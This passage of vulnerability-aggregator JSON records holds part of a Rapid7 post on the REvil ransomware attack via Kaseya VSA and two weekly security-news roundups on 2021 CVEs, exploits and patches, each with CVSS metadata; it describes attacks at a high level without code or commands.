fewer than 60 Kaseya customers, all of whom were using the VSA on-premises product, who were directly compromised by this attack. While many of these customers provide IT services to multiple other companies, we understand the total impact thus far has been to fewer than 1,500 downstream businesses. We have not found evidence that any of our SaaS customers were compromised._\n * The Compromise Detection Tool, which was originally only provided directly to customers, [has been made public](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>). The tool searches for indicators of compromise, evidence of data encryption, and the REvil ransom note.\n * Kaseya also stated that \u2014 based on advice by outside experts \u2014 customers who experienced ransomware and receive communication from the attackers _should not click on any links as they may be weaponized_.\n\n### 2021-07-05\n\n * Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger [issued a statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/04/statement-by-deputy-national-security-advisor-for-cyber-and-emerging-technology-anne-neuberger-on-reporting-kaseya-compromises/>) noting that the President has directed the full resources of the government to investigate this incident and urged anyone who believes their systems have been compromised in the Kaseya ransomware incident to immediately report to the Internet Crime Complaint Center at <https://www.IC3.gov>.\n * The Associated Press [is reporting](<https://apnews.com/article/joe-biden-europe-government-and-politics-technology-business-fc0df4c42f8cd6148bf936ca24bb5cbe>) that REvil has offered a blanket decryption for all victims of the Kaseya attack in exchange for $70 million.\n * Incident responders across multiple firms are indicating the number of victim organizations is in the thousands, spanning over 18 countries.\n\n### 2021-07-04\n\n * Cado Security published [resources](<https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack>) which can aid responders as they triage theie exposure to the mass ransomware incident.\n * CISA and the FBI have issued [guidance for MSPs and their customers](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) who have been affected by the Kaseya VSA supply-chain ransomware attack.\n\n### 2021-07-03 Update\n\n * The Washington Post has [a story with information on the ransom demands being made](<https://www.washingtonpost.com/technology/2021/07/02/kaseya-ransomware-attack/>)\n * The Dutch Institue for Vulnerability Disclosure (DIVD) [posted information](<https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/>) into their ongoing investigation and response into the Kaseya incident, which includes details on their efforts to identify and secure internet-facing VSA servers.\n * CISA posted an [initial advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>) and is taking action to understand and address the recent supply-chain ransomware attack.\n * Bloomberg [is reporting](<https://www.bloomberg.com/news/articles/2021-07-03/number-of-victims-continues-to-grow-in-massive-ransomware-attack>) that the attack (so far) spans over 1,000 organizations across 11 countries with numerous downstream impacts.\n\n### Original/Main Content\n\nEvidence points to a supply chain attack targeting Kaseya VSA patch management and monitoring software. Ransom notes suggest REvil is behind the coordinated attack.\n\nRapid7 Managed Detection and Response teams suggest that, out of an abundance of caution, organizations that use either an on-premise Kaseya VSA solution or the Kaseya cloud-based VSA solution perform the following steps immediately:\n\n * Disabling or uninstalling the Kaseya agent\n * If you host the Kaseya management server, shut down this system (Kaseya also strongly suggests this course of action)\n\nKaysea appears to be providing updates via their [public helpdesk page](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) and their [status page](<https://status.kaseya.net/>) provides visibility into the status of their hosted infrastructure.\n\nResearcher [@BushidoToken](<https://twitter.com/BushidoToken>) has provided a [link to a GitHub gist containing the REvil configuration dump](<https://twitter.com/BushidoToken/status/1411054457450811397>), which includes indicators of compromise organizations may be able to use to detect evidence of these actors operating in your infrastructure.\n\n## Rapid7 Customers\n\n### Managed Detection and Response\n\nRapid7's Managed Detection and Response (MDR) team had existing attacker behavior detections that identified Kaseya-related ransomware activity beginning on Friday, July 2, 2021. Following the initial wave of alerts on Friday, July 2, MDR sent an email communication with a `Critical Advisory` to all MDR customers with guidance on disabling Kaseya and mitigating risk. We have conducted hunts across customer environments and deployed additional detections to accelerate identification of the threat. Affected customers have been notified.\n\n### InsightIDR\n\nRapid7 has deployed the following detections in InsightIDR for attacker behavior related to the Kaseya ransomware attack:\n\n * Attacker Technique - CertUtil With Decode Flag\n * Suspicious Process - Renamed CertUtil\n * Suspicious Process - Certutil Decodes Executable File\n * Attacker Tool - KWorking\\agent.exe", "cvss3": {}, "published": "2021-07-13T16:00:00", "type": "rapid7blog", "title": "Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-13T16:00:00", "id": "RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "href": "https://blog.rapid7.com/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n![](http://feeds.feedburner.com/~r/avleonov/~4/gHnqqNZIYuo)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The third episode of Last Week\u2019s Security news, July 5 - July 11. There was a lot of news last week. Most of them was again about PrintNightmare and Kaseya.\n\nThe updates for PrintNightmare (CVE-2021-34527) [were finally released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) mid-week. It became possible not only to disable the service, but also to update the hosts. This is especially important for desktops that need to print something. But the problem is that these [patches can be bypassed](<https://twitter.com/wdormann/status/1412813044279910416>). "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE". Microsoft has updated their security update guide after that: "if you set this reg key to = 1 then the system is vulnerable by design". It seems that solving this problem requires hardening and registry monitoring.\n\nPrintNightmare exploitation just got easier. Rapid7 security [researchers have added a new module](<https://www.rapid7.com/blog/post/2021/07/09/metasploit-wrap-up-120/>) for PrintNightmare to Metasploit. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\\SYSTEM.\n\nThere was a lot of news regarding Kaseya, I would not say that in a week we learned something fundamentally new, but almost all guesses were confirmed. [7 CVEs that could be used in attacks became known](<https://www.rapid7.com/blog/post/2021/07/08/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) (CVE-2021-30116, CVE-2021-30117, CVE-2021-30118, CVE-2021-30119, CVE-2021-30120, CVE-2021-30121, CVE-2021-30201). Huntress Security Researcher [Caleb Stewart has successfully reproduced the Kaseya VSA exploits](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) used to deploy REvil/Sodinokibi ransomware and released a POC demonstration video depicting an Authentication Bypass, an Arbitrary File Upload and Command Injection. [Brian Krebs also wrote about a directory traversal](<https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/>) vulnerability (CVE-2015-2862) on the Customer Portal portal.kaseya.net that has not been fixed since 2015. The portal "was deprecated but left up". The Compromise Detection Tool has been made public. The ransomware operators have demanded $70m for a master decryption key. Some threat actors were targeting victims via email with fake patches that push Cobalt Strike payloads. [Kaseya delays SaaS restore to Sunday July 11](<https://www.theregister.com/2021/07/09/kaseya_saas_restoration_july_11/>) and promises \u201cexponentially more secure\u201d product. And if you think that only Kaseya has such problems, you are wrong.\n\nContinuing on the theme that the security problems of service providers are your problems. [Morgan Stanley has confirmed a data breach](<https://www.darkreading.com/attacks-breaches/morgan-stanley-discloses-data-breach-/d/d-id/1341503>) in which attackers were able to access personal information belonging to customers by targeting a vulnerability in the Accellion FTA server. Attackers were able to access participant data, including name, last known address, birth date, Social Security number, and corporate company name. The server belonged to Guidehouse, a vendor that provides account maintenance services to Morgan Stanley's StockPlan Connect business. While Guidehouse patched the vulnerability within five days of its availability, the attacker was able to access the data around that time, officials said. The vendor discovered the attack in March 2021 and learned it affected Morgan Stanley in May. As you can see, 5 days for patching a critical vulnerability at the perimeter is unacceptable.\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) [has released an analysis](<https://www.cisa.gov/publication/rva>) detailing the findings from Risk and Vulnerability Assessments (RVAs) conducted during the 2020 fiscal year across industries. The officials' analysis details a sample attack path an intruder could take to compromise an organization, with weaknesses that represent the ones CISA saw in RVAs over the past year. Quite interesting stuff, especially [the infographics](<https://www.cisa.gov/sites/default/files/publications/FY20_RVAs_Mapped_to_the_MITRE_ATTCK_Framework_508_corrected.pdf>). For example, it was especially interesting to see statistics on Initial Access. Phishing links were most common and used to gain initial access in 49% of RVAs. Next were exploits of public-facing applications (11.8%), followed by phishing attachments (9.8%). Therefore, if you focus on anti-phishing and perimeter control, you are building your first line of defense correctly.\n\n[North Korean APT Lazarus Group impersonates](<https://threatpost.com/lazarus-engineers-malicious-docs/167647/>) Airbus, General Motors and Rheinmetall to lure Job-Seeking Engineers into downloading malware. This is stated in a report published by AT&T Alien Labs. The ultimate payload of the Rheinmetall document uses Mavinject.exe, a legitimate Windows component that has been used and abused before in malware activity, to perform arbitrary code injections inside any running process. The Airbus document macro executes the payload with an updated technique. The attackers are no longer using Mavinject, but directly executing the payload with explorer.exe, significantly modifying the resulting execution tree. So, when you suddenly see interesting job offers in your inbox, be careful.\n\n[A set of high-severity privilege-escalation vulnerabilities](<https://threatpost.com/cisco-bpa-wsa-bugs-cyberattacks/167654/>) affecting Business Process Automation (BPA) application and Cisco\u2019s Web Security Appliance (WSA) and could allow authenticated, remote attackers to access sensitive data or take over a targeted system. The fact that authentication is required makes it less interesting. In addition, these are apparently not the most popular Cisco products. But if you are using BPA or WSA, be aware.\n\n[Four security vulnerabilities](<https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html>) (CVE-2020-7388, CVE-2020-7389, CVE-2020-7387, CVE-2020-7390) have been uncovered in the Sage X3 enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable hackers to execute malicious commands and take control of vulnerable systems. Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required.\n\nMultiple security vulnerabilities have been [disclosed in Philips Clinical Collaboration](<https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html>) Platform Portal (Vue PACS). Successful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system. \u0415verything related to medicine requires the strictest certification. As you can see, it doesn't help much.\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/L83_6PGWaZs)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-11T20:52:51", "type": "avleonov", "title": "Last Week\u2019s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7388", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30201", "CVE-2020-7390", "CVE-2021-30119", "CVE-2020-7387", "CVE-2020-7389", "CVE-2021-34527", "CVE-2021-30116", "CVE-2015-2862", "CVE-2021-30121", "CVE-2021-30120"], "modified": "2021-07-11T20:52:51", "id": "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "href": "http://feedproxy.google.com/~r/avleonov/~3/L83_6PGWaZs/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}